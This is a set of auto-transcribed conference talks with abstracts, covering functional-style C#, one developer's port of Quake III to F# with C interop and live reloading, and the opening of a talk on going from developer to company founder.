easy to understand more expressive as well please absolutely so the first also takes a predicate which you could also use absolutely and the reason I like this format more than the other is this gives me a little bit more flexibility to add more rules and remove rules so I like that separation of concern a little bit so that's why I'm a little reluctant for those shortcut methods even though this may be one more line of code this gives me a little bit more option to vary the combination but but point well taken absolutely please about there are no available loops rooms this will blow up but you could also do a first or default if you want to or you could put other conditions around it and program it a little more defensively as well I want to talk about wow go ahead please implementation off it's relying on the implementation of the first you are saying well well the correct that's right it's not written anywhere there yes well well that's another story they're lazy well when we when we deal with functional style composition and laziness are the two key factors in my opinion we talk about immutability we talk about higher order functions those are constructs very important but to me practically to be able to use a functional style these are the two things I rely on laziness and composition it's about about a second nature to kind of expect it if the laziness is not there then it's not as effective as you would use composition because composition itself is going to give you overhead laziness is the one that gives you that reliability of you know performance as well so it's hand in hand there are languages which give you composition and not laziness but that's not very effective they eventually have to come to that laziness point of view so it kind of becomes an expectation but it's good to verify as well yeah one last thing I want to talk about I got two minutes but I want to cover that if I can design with higher order functions I want to give you a quick example here if you will of of one thing we can do I want to look at one class here just to illustrate the point I have a class called over here the class is called what is it called I've got a property computer the property computer uses an algorithm but it doesn't want us to decide the algorithm up front you can pass the algorithm in and the algorithm it's going to use in computing and says algorithm calculate something for me so let's look at the property computer for a second I say property computer computer one let's say a computer one equals new property computer and I got to give it an algorithm well let's look at the algorithm for a minute that is an interface right doesn't do anything it's just an interface I've got another one called fast algorithm which is doing some fast calculation let's say I've also got a most accurate algorithm which is also doing some calculation so I want to use these guys so what would I do I would say new fast algorithm so fast algorithm so once I create the algorithm for this guy to use I can say computer one dot compute whatever he wants to compute that's a function I'm going to send some value to it so you can see in this case it is going to use the fast algorithm to do the job similarly I could use one other example here I could say computer two for example and I could say what I wanted to do I could say two here and say whatever I want that to do for example in this case that would be the most used one so let's say most accurate right algorithm so the point really here is we would have to specify classes that we want to use and write the code with it but that's a lot of code to create because we have an inheritance we have hierarchy we have classes more things to write that's a good old strategy pattern but thankfully we don't have to work that hard what we could do instead is we could simply have a library of algorithms so for example we could say class algorithms so obviously you would put this into a separate file if you want to and then within this you could say public static and you would say you know compute or whatever you want to do let's take a fast algorithm how about that and the fast algorithm takes an input and we will simply return the input right here right and similarly you could have an accurate algorithm of some choice so we'll call this as accurate so you can rather than creating classes you can create a library of these functions very effectively but here's the beauty we could go get rid of all these monstrous code that we end up creating and make it very lightweight we say this is going to be a function which takes an integer and returns an integer or whatever that you want to deal with and in this case of course i'm going to pass in the values to this particular object right so it should be double and double so we'll say double and double and what does this do it wants a funk object so let's go ahead and say this is our funk object and then i'm saying this is my algorithm and i just remove this part so now i've turned this into a single method implementation very lightweight compared to what we had to do before but the beauty of this is we can simply say now let me just change it to double here so this is takes in a double as an input and returns a double as an output so i got these two methods i could have other methods also i create but the beauty is i simply replace this part with simply algorithms dot and then i could say fast for example likewise i can replace this with a algorithm over here algorithms dot and i could say accurate so the the beauty of this approach is we can simply now start using methods so you can quickly throw in a little method implementation here or you can start referring to other library methods and that makes your code a lot lightweight if you will so to summarize what we talked about here we've been writing code in C-Short for a long time but if we stop for a minute and think of primitive obsession think of higher level of abstraction think of more of a declarative style than imperative style think about how we can actually frame together a set of functions to really be able to express our ideas we don't have to spend as much time and effort to write code the code becomes more expressive more easier to maintain easier to understand and the language already has this power but the biggest change is in our mindset i hope you found that useful thank you you
|
Since the introduction of lambda expressions in C#, we have had two different style of programming. Yet, programmers used to the habitual style often find it easy to fall back on those old practices. In this presentation we will take a number of common tasks we code in C#, discuss the downsides of the habitual style, transform it into functional style, and discuss the benefits. We will also discuss some techniques that can help make this transformation easier on everyday projects.
|
10.5446/50878 (DOI)
|
Hello? Hello. Well, thank you for joining this talk. This is a boarding crate three to F-Sharp. It's like my journey to learning functional programming. I'll tell you a little bit about myself. I'm Will Smith. I just, I've lived in Nashville for almost 25 years. I've recently just like moved out to San Francisco to join a startup called at Techius. And so there's like moved there like four weeks ago. And now I'm like flying out here. It's my first time to Scandinavia or like even Europe or even a different country in general. So it's like there's a lot of stuff going on a little bit. So I'm going to tell you a little bit about what I do now. I use, as my job, I use Xamarin and F-Sharp for Techius. This is what I'm going to be doing. This is my full-time thing. And I'm really happy to be doing this. But so anyway, what is this talk really about? Enterprise. Quake three, we can use it for the enterprise. We can leverage all the AI and do all those computations that all those enterprise folks just want to use. You can leverage any framework using it. You can see we've got, look, we're really taking advantage of everything. No, I'm just kidding. It's not at all what this is about. So what is it really about? So I saw a project. I called it F-Quake three. I don't even know if it's even like a good name. Am I very good with names? I just call it F, same for like functional or F-Sharp. Quake three. So you can kind of get an idea of what's probably behind it. But this is like my journey to learning functional programming by doing this port. So the first thing I want to talk about is that with this port, questions that will probably be asked is like, how's the performance? How much has been ported? Well, performance doesn't matter because first I need to get everything working. If it doesn't work, then it has to work. But to get it ported, like, the amount of porting I've done is only like 5%. This is like over a decade's work for somebody to do. But I'm trying this because I really want to see how functional programming can be applied to something, you know, big. It's not something that not Fibonacci, not Fizbuzz, Quake three. So this begins my journey of like, how did I actually get up to this point? So before I even did this or even started learning functional programming, you know, I did some contributions to like a few projects that were in C++. It was okay. The community and how people acted, it was all right. But I kind of moved away from that and like, all right, I'm going to learn C++ 11. It's got land-dots, that functional thing I hear about, and they got that. So I decided to learn it, but then it ended up not really working out for me. Things are just not expressive as the way I wanted it to be. So I moved away from that and found this project, this open source project that a guy named Frederick did, and I did some contributions to this. So RTCW co-op, if anybody doesn't know, it's return to Castle Wolfenstein cooperative. So you can play the single player campaign of RTCW with your friends. And so this is based on Quake three engine, and I went and just made some contributions to it, and it was written in C. So things I noticed, C was actually kind of elegant compared to C++. There's this separation of data and behavior. Things started to just kind of feel right, and developers were actually kind of friendly, which was like, okay, well, I don't feel like I'm being shoved against the wall here, so it felt nice. But I started to do something interesting. I tried to write C functionally. It's like, let's just make a variable. I'm just not going to change this variable. Let's just see what happens. And it was actually kind of interesting. It started to feel right, and I realized that I'd probably need to find a functional language that actually embraced this. And so I found Fsharp out of all the functional languages that are out there. I found this because it fit my requirement of it being functional first, because I still want to use mutability for actually interacting with existing libraries that exist out there. So I have to have that. That's just, that's what you have to do. You have to update the screen. So you have to have some form of mutability there, but if you can push everything to be as functional as possible, that's what I was looking for. And so Fsharp kind of felt like, okay, this is what I wanted to use, but I needed to make sure that it was okay. I started doing some mono research because I always hear about the mono runtime being, oh, it's bad, it's slow, it does all this. But I started doing research on it, and it really wasn't as bad as what people really made it out to be. And I did some examples of my own to see if it actually fit. And sure enough, I felt good about it. I felt confident. And I did all this stuff starting out just in Ubuntu. So I started learning Fsharp and using mono on Ubuntu before I even moved to OSX or Windows using it. So I actually was like, okay, this is actually not as bad as what people say. So I can also use this at work. So Fsharp for Xamarin, iOS, and Android, like right now, I'm now doing Fsharp and iOS. And of course, Fsharp reminded me to see with data and behavior being separated. So okay, that's cool. Made a few example projects using Fsharp. And then that's when Fquake 3 was born. So I wanted to do something real. So now I want to give you a demo of this. Don't have the CD key. Oh, well. Okay, so here I am in the game. My name is Fsharp Quake 3 guy. So this is actually running Fsharp code. There's still like a huge portion of C there, but there is a good portion using Fsharp code. Well, how do I make you believe that? So let's change something then. And my weapon was modified on the fly using the Fsharp interactive. So here I can actually change anything and do whatever I want. And this is a good way to actually learn what is actually going on, like just in the code to figure out, you know, how can I do this, how can I do that without having to recompile the whole thing and running it. I can do it here on the fly and do whatever I choose. I can only do it for the weapon position in this case, but I just see that there's some sort of future in doing stuff like this. That's where I feel development is going to move towards. You'd be able to write something immediately and see the feedback, like on the fly. So what else could I do besides have this weapon that's really far out? So let's go into third person. So there's a head. And now it's up there. Cool. And now there's no head. And now there's Don Sein. So let's go defeat the other Don Sein that's running around in this level here. Where'd he go? Oh, there he is. Come here. Goodbye. So this is a little simple example. We can take it a little bit further in some sense. So I want to write some logic on the fly here and see if I can do it correctly. This is the cosine. Gosh, what? He must have escaped. Okay, now he's like completely winging out right now. I have no idea what's going on. I just want to slow him down just a little smidge. Maybe even more. Okay, now it's starting to feel a little bit better. Oh, baby. There we go. Oh, thank you. So yeah, we can do all kinds of stuff. It's just using a simple, you know, we got the time of the client game. Let's do a cosine over it. So that's why it gets the movement doing this. But this is just a simple example proving that, yes, this is like running F-sharp code. But there's a demo. So back to now, for those of wondering, like, how did this actually work? Like, how did I get this working? Well, there's a thing called the F-sharp compiler service, or Foslin. So it exposes additional functionality for implementing F-sharp language bindings. And so it's a, I'd say it's decently pre-sable and has a pretty simple API to use and really good documentation. And so this allows you to embed the F-sharp interactive and anything that you want and just be able to evaluate expressions and script files of any sort. So to give you the example of how I use this, so looking back at the weapon position that I modified, well, here's the function. It takes C game and returns a tuple of two vectors. So one's position, the other one is angles. That's it. And these types are all completely immutable. So there's no side effects going on in any of this. So in the file, I have to set a mutable variable. Just think of it as a FSX and really it's just going to contain the implementation of the calculate weapon position so I can change it at any time because it's going to look and actually call FSX. And so within the same file, I choose what code I want to compile with and the code that I actually want the FSI or F-sharp interactive to run. And so you see nothing's interactive, but in the else that let mutable, that's actually going to be compiled. Whereas in the actual implementation here, if the interactive, this is where all my logic is. And in that same implementation, the one that's actually outside the if interactive, that's when I actually call the FSX to call the implementation. And this is, I wanted to show this because this is like verbatim from the F-sharp compiler service documentation on how to actually boot up and embed an FSI. It's pretty simple. I just copy and pasted it and it like pretty much worked with one modification to the R, the FSI, EXE. I'm choosing which FSI that I actually want to run that actually works with mono. And so how I detect file changes is just, all right, get the last right time. All right, if the last right time is different, well, we'll just evaluate it. FSI session of Alscrape weapons FSX. And that's it. And if there's an exception, I just eat it. I really don't know what to do. I just eat it. And so this is just where it gets set. So calculate position FSX. I set that with a new implementation of whatever calculate weapon position I have. So that's an example of how I got that working. Now, moving on to really, this is like the core thing I really want to present is like, do you really get benefit at it like using a functional, just doing functional style programming in general, like in doing this? And I want to tell you yes, and I want to prove it to you. So benefits of functional are immutability. So variables, well, really, they're not variables anymore, they're really just values and they just cannot change. And you have referential transparency, and that just means whatever input you give it is the same output that you get. Same input, same output, and that's like, that's what that means. So now let's look at some C. So here's a function called call local box. So if you're wondering what this function does, I'll tell you, but it's actually kind of irrelevant. We're just really looking at where functional actually helps you. So call local box really just says, whatever my view frustrum is, am I, do I actually need to draw a model or a mesh that's in my frustrum? Yes or no? And that's just what this function does. So looking at this, there's some local variables here. We've got parameter called bounds. Okay, cool. So now we're in the implementation of this function called call local box. Now you see some things here. Where do these come from? They weren't passed in. They're not local variables. They're global. Who knows where they're defined, but they're using them here. So why is that actually bad? Well, to give you an example, we're going to start out by looking at this specifically. tr.or. So if you get familiar with what this is, tr really is the entire, like, render state of the client. And or is really orientation. Orientation of what? It doesn't care. It's just a place of store orientation for it to use anywhere at once, which is actually not that good. So we're going to figure out, like, what is going on there. So looking at where co-local box is getting called, here's another function called co-model. Got some local variables and some parameters. Okay. And the implementation of co-model, there is no sign of tr.or being set anywhere. But yet, there is co-local box being called, but we don't know where tr.or is actually getting set. We still don't know yet. But we do know that now, co-local box depends on tr.or getting set. Moving on, we go a step further up. There's no function, add md3 services. And in there, it's going to call co-model. But there's still no sign of tr.or actually getting set in this function. So we went, like, one, two, like, few levels out and there's still no place where it's actually getting set still. That makes co-model be dependent on tr.or. Okay. We go up another level. Sure enough, there it is. This is actually where it gets set. You don't actually don't know if it's really getting set, but this is like an out pointer right here and that's where it's going to get set. The comment tells you, but you shouldn't always rely on comments. And sure enough, there is add md3 services. Now, why in the world could they not just pass that in? Why do they have to set it to the global? This makes add md3 services not reusable because it's not even an abstraction at that point. Because it relies on tr.or to be set somewhere. And you didn't know that. How are you supposed to know that? You have to dig through the implementation of what add md3 services does and it calls co-model, then it calls co-local box. Okay, it does all that. But you have to dig through and find out that it's setting that. You would have, it's not an abstraction at that point. It's just, it's broken. So, it depends on that. Okay. And the function signature should really tell you what you need to do. But in this case, it really doesn't. It doesn't tell you that it needed that at all. So what am I doing in fsharp when I'm doing this port? So here's our co-local box again. And notice that I actually have parameter called orientation. So I'm actually passing that in. I'm not bringing any globals into the scope of this at all. I'm actually just passing as a parameter. It tells you what the dependencies are when you do this. Going further up again, we look at co-model. And you start to see that, okay, there's renderer. That's that R right here is really that TR. And I'm just passing the entire global state in. So that means I'm taking that unmanaged type TR, copying everything over to immutable type on fsharp that is just a record, and then passing it to this function. So, of course, that's costly. But that's like the proper way to do it right now. But then you start wondering, do I really need to pass in the entire global state of this? Do I actually need to pass all that in? And sometimes you may find out, wow, I actually don't. And that's when you can start refactoring stuff. And it becomes a little bit safer because you have immutability. It's safer than like, hmm, if I try to move this or make it shorter, will that affect something else that mutated this? I mean, it just becomes like a big spaghetti. But if you make everything immutable and reference you transparent, it like, it pretty much goes away. And it becomes actually a lot nicer to refactor and actually starts to feel good. So to recap, benefits of functional. See, it's easier to spot functions that have multiple dependencies. You can see the flow of data through all the functions. When we passed, or what they should have passed is the orientation all the way through those functions because you don't know where the data was coming from or reasons why. So the story isn't even there. So that's one benefit of functional that I found like very, very like pleasing. And refactoring is easier. And having a discipline of purity by doing this, by causing no side effects whatsoever and everything's reference you transparent, which I mean, purity really kind of like means all those, then you get all these benefits. So now I want to get into something else I kind of noticed that was interesting. And doing this port. So there's a type in FCR called discriminated union. And really what this means is think of an enum with data associated with this. And the easiest way you can explain it, which is actually kind of interesting. So let's look at some C. Oh, gosh. Okay, so we got a switch right here. So we're going to figure out what that is. Yeah, face, triangles, and poly. And so if the surface type is a face, then here's how it's going to get the data out of it. The same thing that we're trying to do a switch on. We're going to cast it as this type to get the data out of it. Here, here, and here. Okay. Kind of interesting. Something's kind of familiar there. So what does the FCR version look like? Well, man, there's a fancy switch statement called match. And it's almost the exact same thing. If it's the surface's face, get the data. If it's the triangles, get the data. If it's poly, get the data. But this is all like locked in with FCR. The C version, I mean, you're casting anything you want. You don't even know what you're going to get. But that's just like what they did. And I found that interesting when porting that portion to this actually felt kind of natural. And I didn't have to like think about it a whole lot or do some like weird things. So just similar. But are there any scary spots? Okay. And that's what I want to go into. So let's look at surface type that we saw. They had the face, the triangles, and the poly. It's really just an enum with all this stuff. Okay, cool. And here are the data associated with it. And notice that the very first field is surface type. So that in memory, when we do a switch on the surface type, not on the data, but just on the enum, if we cast it as flare, then we're going to get the data associated with it down here. And so here's like an F-sharp version, how I'm defining a surface. So there's face, triangles, poly, and all that stuff. And then the data associated with it. But C is really just not safe. And here's what I want to show you why. So here's a function, well, not a function. So here's a struct. It's in a completely different file, a completely different context for a completely different reason. Okay, there's nothing in here saying surface type at all. There's no type, even at the first field, which is ident, but it really comes out when you read a model file, you get surfaces, triangles, and other data associated with it. But this in particular, ident, will always be IDP3. But they did something weird when they loaded these model files. Oh, they decided to change it. SFMD3. Now, so that means they're using this struct. It was in a completely different context, completely different file. Now they're going to make it be used as a surface type, which is absolutely dangerous. And actually, it was stuck on this for probably about a day, because I couldn't find where the data was coming from. It was defined in another file, and a totally different project. Oh, no. So they decided, hey, we can just change it, and use it. How clever. But in this, I thought it was kind of interesting to see poor man's discriminated union, poor man's pattern matching, and see if there were things that actually start to kind of feel right, and how the support to F sharp actually started to feel kind of natural. So moving on. Now, this is something that I'm actually still struggling with, is how I'm communicating back and forth between F sharp and C. And it's actually kind of, it can get hairy, but I'm trying to find a solution around that, and I'll get into it. So first, let's look at the project structure. So we have our main executable, F plate three. We have the original C products in the native folder. So that's the original Quake 3C that was, that was on, that's on idSoftware's GitHub. And we have this thing called M, which really is a, it's my own version of a mono abstraction, so I can easily call methods and invoke and do things that I want without having to do all the boilerplate that I need to do when calling mono C, when calling the mono C APIs. And then you have the engine and client game, and this is the F sharp side. Then you have, I have some tools, so this is going to contain like parsing, math, and a couple other things. And then the launcher, which is just the main launcher that calls engine.system. It actually boots everything up. So let's look at how F sharp calls C. It's pretty basic. In.NET you use P invoke to do this. There's platform invocation. And there's nothing extremely interesting about this other than I have this suppress unmanaged security, which makes the call a little bit faster when hitting it. And then sometimes I'll wrap this stuff up so we're not actually hitting the main P invoke method. I'm just wrapping it. And so when calling these C functions, I have to go in and modify those C functions with this M export, M decal. And what actually are these? Now let's look at it. So M export just tells the C call that, hey, somebody might actually call this function from the outside of the dynamic library. That's really what that means. It marks it. And there's different implementations on that and Microsoft Visual C++ and GCC or Clang. They have their own different like versions of that. So wrap it up in the if define and the elift define. And the same goes for M decal. And M decal is just a calling convention. There's a couple of different calling conventions. I don't know why blame Microsoft on that because really you just need one which is C decal, which works on GCC. And it's really like the standard. And so that's wrapped up in platform specific stuff too. So that's that. So now how does C call the F sharp code? Here's an example. So this is this M invoke news really just a macro and you give it a assembly name, give it a name space, module and a function. And the result is really the output and the rest of it is just very attic arguments. You can pass any number of arguments you want in there and it'll just take care of it. And so that's how I'm calling it. There's a few things to note here that's actually kind of I don't like very much is you see this thing called QM of QM of and an M object of. This is where I take these C structs and I have to map them to a managed type and then pass them in to this function. So I'm doing all this whole big conversion thing of all these types is actually becoming quite tedious. I mean, I have a couple thousand lines just dealing with this and it's actually like that's most of my time has been doing that rather than writing the actual logic, which has been kind of stinky. But I'm trying to find I'm trying to figure out a better way to handle the problem and I'm actually trying to find time to do it. The M object has arg just the quickly over it. It's really not that important. All it does is all right if the if the type was a struct, we need to unbox it. That's really all its job is doing because if I want to have something as a reference type and I want to change it to a value type, I want everything to just still work. And so this is just like boilerplate that I just have to do. So now I do all this stuff based on conventions. So these are a bunch of more, more macro stuff that I don't like either because I'm actually just blow away like almost like all that eventually. But this is just what I chose and this is just like the path I decided to go. But you live and learn. But these conventions will look for a module say of VEC 3 and look for these particular function names called of native pointer and to native pointer of native pointer takes a C struct VEC 3 and converts it to a F sharp idiomatic type. And then to native by pointer really just takes the F sharp idiomatic type and puts it back to an unmanaged. And so I do that all within the same module. So all that mappings are done within here and all done in F sharp. So here's just something like this is what you have to do in order to get a method. Bunch of stuff. Okay. And before I get into this, I just want to show what these how these functions actually getting called. Hey, look, there's co-local box. So we're kind of familiar with that a little bit. So have this if zero around it. So this is the old C code that was there. I just have it basically not commented out. I can just switch it to one and it will run the C code. Otherwise, it will run M invoke. It will run this invoke new. So that's how it works. So any code that's in C still calling co-local box will forward that to the F sharp function in invoke new and actually run that logic. So I just wanted to show like where like what what's going on there. Okay. So now how is the the math side of this stuff done? It's like, okay. We got our vector three. Now, this is me being completely naive. I didn't even know anything about math. I actually started doing this, but I really wanted to learn the math. So I just had to start building my own. It's like a good way to learn, but probably you shouldn't use it. Only I should. So our vector three type, then we have all our, you know, standard functions for vector three dot product cross product length, length squared normalizing. But one thing to note about a feature in F sharp that like I do enjoy by trying to abuse a lot is inlining. What inlining does is it takes whatever implementation of one of these functions are and wherever you call this, it'll just actually use the implementations to have calling the function. So you get rid of the function overhead and you get rid of all the the parameter types being copied. So there's there's performance benefit gain that you can get from that. So if you didn't say inline adopt product and you're doing 100 million calculations on it, it's going to take you like 200 milliseconds. But if you inline it may take you 60. All and all you had to do is put inline. And so that's something that's that I actually kind of enjoy thinking about. And here is using units of measure. One thing I actually hit at one point. I was trying to figure out does this function take degrees or is it take radians and I had like I had no idea. I found out actually took degrees. The later converted onto radians. But using units of measure, I can like type safe that. So whatever they pass in, you know, if it's degrees, they pass in degrees and whatever implementation that function is, it'll take care of it such as a lax this angle and rotate around point. It's just like showing an example. It's not completely terribly important, but it's just kind of simple. Okay, and how I'm parsing binary. So not getting too much detail, but I just wanted to show. I'm using something very similar to f parsing. If you don't know, I don't think you're familiar with, but I'm really what I'm here. I'm doing is I'm representing all the the reads for parsing is really a computation. So when you want to actually use the logic such as something like this, you don't actually see the stream dot read stream dot that stream dot that. Really, I'm just representing this as a computation here where you don't have any of that noise. It's like, yes, I know I'm going to use stream that read. I know that here you don't have to just kind of like write what you want and then return the type of structure that you want back, such as P triangle. All right, pipe three. I want to get three in 32s and I want to return me an empty three triangle of whatever values the three in 32s gave me. That's all it is. And that's all I have to represent it as. So this is actually kind of nice. And it's an example of like how you run, like say the model parser. It's like, all right, parse bytes function called parses. Throw in the data, takes care of it. It's, again, not too terribly important. We just wanted to show it. It's kind of like the main implementation of where the things actually start. So it looks very similar to what you saw before. Pipe three, we're going to get some data. We're just going to turn frames, tagging services, and we're going to give it the structure. And then here I have testing against this using a FS unit and in unit. And just taking to make sure it actually like works. So now let's see. I want to get into probably not a whole lot on this, but I do want to show something I've been working on most of my time. It's a library I've been creating called Ferop. And what this library will do is allow you to have inline C and F sharp. And then it will know how to compile it when you compile your F sharp code. So compile the C, generate the proper P invoke methods, and just use it idiomatically. So to show you an example of this, I've now switched to OSX. This is using Xamarin Studio and F sharp. So something of how this thing works. I define a function called init and it's going to turn me a application. And then here's the C that I've written. So inline C. I'm going to compile this and run it. It'll know to compile the C and generate me a dynamic library. And I'll get something like this. So this is using Ferop F sharp and just something that I've actually learned from Matthias on Fractals, which is I kind of took it a little bit further. So this is actually kind of neat. So I'm trying to solve the interop problem that I'm having and dealing with all the types and trying to figure out a really good fit because right now I'm doing a whole, whole lot of boilerplate and need something that like just kind of fits and works together. So that's why I started doing stuff like this. To show you more what I'm doing. So this is actually using a, this is the utils library that I had. And this, so I'm trying to figure out how to load a model file, use openGL33 and just show it on the screen so far. I've only gotten like some triangles that are red so far, which is okay. This actually just took me probably about five days of like a couple hours to get some triangles on the screen. At one point it's, openGL takes a column major storage matrices and I was using row and it completely threw me off guard and I realized I had to transpose it. So that was like eight hours of like complete bashing my head against the wall. So that's an example of using a fair op. So you see I have some of the NaVo code here. And so I'm actually trying to actually use this and actually have fair op integrated with fquake3 running some openGL calls. And with this I don't have to rely on another person's bindings. I can just use the C that's already updated and not have to wait for the bindings to get updated for it. I can just use it here. And so that's why I built it so I don't have to worry about bindings because some of these bindings people don't get paid to do it and so it's not going to be updated all the time. And so I needed to find like an alternative around it. And plus this will help me do the port. So that is an example of that. As of fair op. And so I have a couple links. So there is my github for the project fquake3. And then there is an interesting site by Fabian on a quake3 architecture that I've actually read multiple times to figure out what in the world am I actually looking at. And so that actually really, really helped me a lot. So this has been an interesting journey getting to this point. I'm not sure where this project will go. Like when I've given the time that I have, which I actually don't have now, but I think I have some time for questions. So if anybody has any questions or you want me to show something else on this, just like you can let me know. Yes. So you said you've got about 5% for it. Can you talk a little bit about how you selected the parts that you've imported so far? Okay, yeah. Most of the 5% is done in the rendering because I chose that because I don't know anything about OpenGL and graphics rendering. And so I'm like, okay, well, I want to learn fsharp and rendering all at once. Well, it's one way to figure out, you know, will this actually work in the real world? And so it's like, okay, it does. So I chose that just to learn it and it's probably going to be the most difficult part. If I can get that done, like all that really heavy low-level stuff written in fsharp, then all like the high-level logic that's actually in C in the engine, like will be a whole lot easier to just port over since I got all that low-level stuff all done and taken care of, especially cross-platform specific stuff. Because it was like, there was probably about 15,000 lines of code per OS dealing with all the cross-platform stuff. And so I'm basically going to be like, okay, you're gone. You're gone. Replace it with an fsharp or a.NET library that already exists that works in all platforms. And so that's like, I just get rid of like thousands and thousands of lines of code with one.NET library, which would be really interesting to see. But that's the path I don't know how far I'll get. I at least want to get the rendering done someday, at least. But once it's done, I don't know where I'll go from there, but it's definitely a journey. All right. Oh, yes. It is a very, very important. Well, thinking about the garbage collectors is probably very, very important. Even like right now, while things are so slow, the garbage collectors are probably getting hit a lot, because I'm making copies of giant structures to a managed type and then back. And so that has a really big performance relation with that. There's also when to use an array versus a list, that sort of thing when using fsharp. And that had actually performance impacts when using large data sets, where we actually really needed to use an array instead of a list. But it's like, it's one point that I hit. Yes. So, now in the conversion, you move between C and fsharp, and I just like you're taking a back to 3D back to a C to fsharp, and now you create a new back to that. So, you're creating new objects to just take this as a.NET sort of map. Yeah, yeah. At some point, actually, it did have something like that. When I was testing performance of like value types and reference types, like I actually had a vector 3 at one point being a reference type. And so, when doing things that have like the same memory, like it becomes broken when you use a reference type. And so, that's why I'm doing the mappings manually right there, because if I want to flip a switch and use a reference type, I can without breaking any existing code. So, that answers it. But in the end of everything, I probably would want to do it in the same memory space instead of doing it manually. Because that one thing would be a lot easier to do and probably be more efficient by a little bit. Probably not by a whole lot if that answers your question. Yes. How do you get your motivation up when you're trying to get something done and you keep getting stuck in the boilerplate? Sorry. So, I have to go to the store. I have to buy a six pack. No, no, I don't have to do that. It's the motivation to do stuff like that is really hard. It's more like I'm just trying to plow through it as much as I can to get something working and then hopefully have something to show. That's the motivation that I have at that point. Some days I had one problem in particular that was completely driving me nuts. I had to actually walk away from it for a couple of days and then come back to it and then go, oh, I didn't need to do all that boilerplate work. I could have just done this or that. So, a lot of boilerplate could probably just be ripped out with something simple because I get stuck and actually create worse code. That's not very motivating. Motivation, I guess, really, it's a really good question. I really like doing it and I really want to see, you know, does F-sharp or functional programming actually do benefit real giant things like this instead of Fibonacci sequence or something like that? But that's why. Yes? Was the functional programming group in Nashville part of that motivation? I guess what I say is that's the first time I actually presented it out there. That's when Brian was like, where does this come from? Okay. Well, thank you. Thank you. Thank you. Thank you. Thank you.
|
FQuake3 is a project started by Will as an attempt to port id Software’s Quake III Arena to F# and to figure out how functional programming can be applied to game engines. The project is less than a year old, and has been worked on by Will in his free time. The talk will discuss Will’s journey to the founding of F# and why he started this project. The project structure, demos, code examples, and comparisons will be presented along with a live code example of how to port a C function to F#.
|
10.5446/50786 (DOI)
|
Are we good? Hey, there we are. We have sound. Come on in. Come on. We're going to make it here. So, first of all, just in case you're worried, I probably won't go the whole hour, so you'll be able to get in the beer queue early. I plan my talk this way because I think of you when I prepare my talks. So, what we'll do is I'll go through my material and then we can take the discussion out into the main hall, get a drink if anybody wants to talk further. I am an open book today around this topic. So, first of all, my name is Anthony Eden for those who don't know me. I run a little company called DN Simple and it really is a little company. And today I want to talk to you a bit about the voyage that I've had from being a software developer to running my own company and what I've learned along the way and some of the things that you might want to, if you're interested in becoming an entrepreneur and starting your own company, might want to look into. And hopefully, I'll give some of you who are on the fence, ooh, do I really want to run my own company, some excitement that says, you know what, I'm ready for this. I'm ready to take the step into entrepreneurship. I'm totally down with that. And hopefully it will encourage you. So, first some history. I've been building software since 1995 when my brother came to me and said, I got to show you this really cool new thing. It's called the World Wide Web and I think it's going to be big. And he came to me and told me this and I looked at it and I was like, oh, this is pretty cool. I can put up pages with pictures. And so I started doing that and very quickly got bored with just these static pages and said, I need some way to take some information down and send it to email. And thus, I started reading 21 Days of Pearl. And that was my introduction into programming. Prior to that, I had played around a little bit with basic programming on VaxVMSs. You know, it's at the house. Everybody has had a Vax at their home, right? Back in those days. Anyways, so played around with Pearl, started building things with Pearl, never actually got into computer science. My degree is in music composition, but I was always really intrigued about building stuff. I'm a creator, all right? And this is going to come back and it's going to make sense later on how this all plays together. If you all want to come in, you're welcome to. There's still more seats in here. You don't have to stand. So building software since 1995 and very early on was thrust into the role of CTO, which is really silly because I was not CTO material. I was CTO by title, but I absolutely had no idea what I was doing. So what I learned along the way is that I would have the opportunity to help screw up many, many companies and play my part in it. And oh, I did. There were lots of companies out there that I took part in that messed up in one way or another. And this is actually an important part of the voyage because when you start running a business, you don't have all the answers. In fact, you'll never have all the answers. You will make mistakes. And that's okay. It's the same as with programming. You take missteps while you're trying to solve a problem in programming, all right, when you're trying to actually build a system and then you step back and you think about it and you refactor, all right, and then you have a test that says, okay, this is what we want to prove is working. You have some code that's running. You refactor. This is a constant exercise. And the same applies to business. You don't have everything right in the beginning. So I learned along the way lots of different things, lots of different ways to fail. One example of this was the first company where I was really involved in as a programmer was Signature Domains. This was back in 1999 during the deregulation of the.com TLD. This is the first TLD that went from having a monopoly, controlling it, to having multiple companies control it. And we made a lot of money in the first two months of business. We made probably a million and a half in the first two months of business. And this was like two guys sitting in an art studio, all right, and it was crazy. It was crazy times, crazy times. And so this had, we could have been a major company now. We could have succeeded in wild and spectacular ways. And I could have a house in Hawaii and be driven, driving a Ferrari. But alas, that is rare. So what happened was is that we didn't know how to take that money we made in the beginning and turn it into more money. We didn't know how to make the, invest back in the company and make it grow. And over the next couple of years, I watched as the founder, who was the one who had control of the money, put it into projects that actually didn't do much for anyone. And so we slowly went away. And this, we were going through this, it was 1999, 2000. And as you probably are well aware, we had the big dot com, the big bubble burst, if you will. And everything went to hell. We, basically I worked for three or four years, just sort of sliding by. And we lost all of the goodwill that we had in all of the money. The second failure that I contributed to came after leaving signature domains. And I went to a company, to work on a company called dot mp. Again, a startup. And in this sense, not a startup like you think, like a funded startup, what you see today, it was essentially a company that was self-funded and trying to grow really fast. Like we were thinking, oh, we're going to be the next thing. You guys can come and sit down if you want to. There's more seats. So we had a really, the one thing that was cool about what we did is we had an early understanding that mobile was going to be big. This was back at a time when we were using, what was that markup language called? The WML? No. What was it? It was like a... No, no. Before that, it was like a markup language for mobile devices for like actually controlling Nokia's. Yeah, that was one of these. It was something like that. It was like a WAP or something. It doesn't matter. The point was is that we had this sense that mobile was going to be big. And this was a long time ago. This was back in, well, before the invention, before the iPhone came out, before smartphones were really taking off. It was just at the early days of smartphones. Nobody thought you'd be running a full-blown web browser with the same kind of processing power that you might have in a normal computer. So we were ahead of the curve. But the problem is we were too far ahead of the curve. So that was another thing that I learned really quickly. It's one thing to have a great idea, but great ideas have to collide with great timing to actually build something that's going to, especially something that's going to hit the consumer space, which is where we were targeting. All right? So failure number two was that. And then the other thing was we didn't have the ability to stay the course. So if you're going to come into a technology early with your business, you're going to have to stay the course until the rest of the world starts catching up with you. And then you can be a leader. And then you can be established. But we couldn't stay the course. Now, there are lots of reasons we couldn't stay the course, including some very serious issues with one of the founder and his family. But the point was is that we had not set up a company that would survive beyond the founder going away and having to do something else. We had not built a company. We had built a piece of software and a project. All right? And there's a big difference between the two of them. After this, I said, screw this startup stuff. I'm going to go work for the biggest company in the United States, which is essentially what the US government is. When you start working for them, you're working for the largest, one of the, like, the largest entity in the US. And that actually taught me a lot as well. My role had a moderate success. I was PMing projects that, you know, were $5 million projects. In government, that's pretty 